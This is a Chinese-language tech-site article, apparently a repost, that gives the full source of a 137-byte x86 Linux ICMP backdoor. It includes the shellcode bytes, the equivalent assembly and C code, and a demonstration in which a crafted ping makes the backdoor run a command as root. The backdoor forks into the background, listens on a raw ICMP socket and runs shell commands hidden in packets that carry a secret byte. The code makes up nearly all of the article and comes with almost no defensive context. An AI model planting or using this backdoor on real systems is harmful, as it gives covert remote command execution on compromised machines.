Linux ICMP后门代码

网络 网络管理
下面我们来对Linux Icmp后门的相关内容进行一下介绍。文中介绍了具体的代码,希望对大家有所帮助。

在不少协议的应用都存在着一些后门。例如我们今天将要介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。使用Ping控制程序:

  /*
  x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
  
  [example]
  
  main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
  Size of shellcode = 137
  
  main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
  PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
  34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
  main:/home/gloomy/security/shellcode/linux/icmp# cat out
  uid=0(root) gid=0(root) groups=0(root)
  main:/home/gloomy/security/shellcode/linux/icmp#
  
  */
  
  #include <stdio.h>
  #include <unistd.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  
  #define SECRET_CHAR "\x99"
  
  char shell[] =
  "\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
  "\x43\x41\x51\xb1\x03\x51\x49\x51"
  "\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
  "\xcd\x80\x31\xdb\x39\xc3\x75\x55"
  "\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
  "\xff\x54\x54\x53\x50\x55\x52\x89"
  "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
  "\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
  "\xb0\x25\x01\xc5\xb0" SECRET_CHAR
  "\x32\x45\xff\x75\xd5\xb0\x02\xcd"
  "\x80\x31\xdb\x39\xc3\x74\x25\xeb"
  "\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
  "\x06\xcd\x80\x5b\x89\xd9\x88\x43"
  "\x07\x80\xc1\x08\x50\x55\x51\x53"
  "\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
  "\xff"
  "/bin/sh -c";
  
  void asm_code() {
  __asm("
  xorl %eax,%eax
  xorl %ebx,%ebx
  xorl %ecx,%ecx
  movb $0x66,%al
  incl %ebx
  incl %ecx
  push %ecx
  movb $0x3,%cl
  push %ecx
  decl %ecx
  push %ecx
  movl %esp,%ecx
  int $0x80 /* socket(); */
  movl %eax,%edx
  
  movb $0x2,%al
  int $0x80 /* fork(); */
  xorl %ebx,%ebx
  cmpl %eax,%ebx
  jne exit
  
  endlessloop:
  xorl %eax,%eax
  xorl %ebx,%ebx
  movb $0x10,%al
  push %eax
  movb $0xff,%al
  push %esp
  push %esp
  push %ebx
  push %eax
  push %ebp
  push %edx
  movl %esp,%ecx
  movb $0x66,%al
  movb $0x0c,%bl
  int $0x80 /* recvfrom(); */
  
  movl %ebp,%ecx
  addl %eax,%ecx
  xorl %eax,%eax
  movb %al,-2(%ecx)
  movb $0x25,%al
  addl %eax,%ebp
  movb $0x99,%al /* SECRET_CHAR */
  xorb -1(%ebp),%al
  jnz endlessloop
  
  movb $0x2,%al
  int $0x80 /* fork(); */
  xorl %ebx,%ebx
  cmpl %eax,%ebx
  je stack
  jmp endlessloop
  execve:
  xorl %eax,%eax
  xorl %ebx,%ebx
  movb $0x2,%bl
  movb $0x6,%al
  int $0x80 /* close(); */
  
  pop %ebx
  movl %ebx,%ecx
  movb %al,0x7(%ebx)
  addb $0x8,%cl
  push %eax
  push %ebp
  push %ecx
  push %ebx
  movl %esp,%ecx
  cdq
  movb $0xb,%al
  int $0x80 /* execve(); */
  exit:
  xorl %eax,%eax
  incl %eax
  int $0x80 /* exit(); */
  stack:
  call execve
  .string \"/bin/sh -c\"
  
  ");
  }
  
  void c_code() {
  int fd;
  int nb = 0;
  struct sockaddr_in them;
  int them_size = sizeof(struct sockaddr);
  char buf[256];
  char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
  
  fd = socket(2,3,1);
  if (fork() > 0) exit(0);
  while (1) {
  while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
  buf[nb-1] = 0;
  if (buf[36] == (char)SECRET_CHAR)
  if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
  }
  }
  
  int main(int c,char *v[]) {
  void (*i)();
  i = (void (*)())shell;
  fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
  i();
  return 0;

那么,具体的Linux ICMP后门查看方法我们就呈现出来了。

责任编辑:佟健 来源: csdn.net
相关推荐

2010-08-26 11:15:47

LinuxICMP后门

2010-08-31 10:00:55

LinuxICMP

2010-07-30 16:10:57

ICMPping

2010-08-02 15:21:06

DelphiICMP

2010-07-13 10:38:54

2010-03-10 10:24:16

Linux ssh后门

2010-08-02 14:29:46

LinuxPingICMP

2014-03-06 17:52:25

2010-01-14 20:57:59

2024-04-03 14:28:12

2010-01-15 10:32:40

2016-02-25 11:02:11

2010-09-13 14:47:58

2010-09-13 15:06:36

2021-05-06 14:46:18

LinuxIcmpudp

2013-04-12 11:07:01

2010-08-02 16:43:46

ICMP协议

2010-09-13 15:14:03

2010-09-13 14:57:29

2019-09-10 09:12:54

点赞
收藏

51CTO技术栈公众号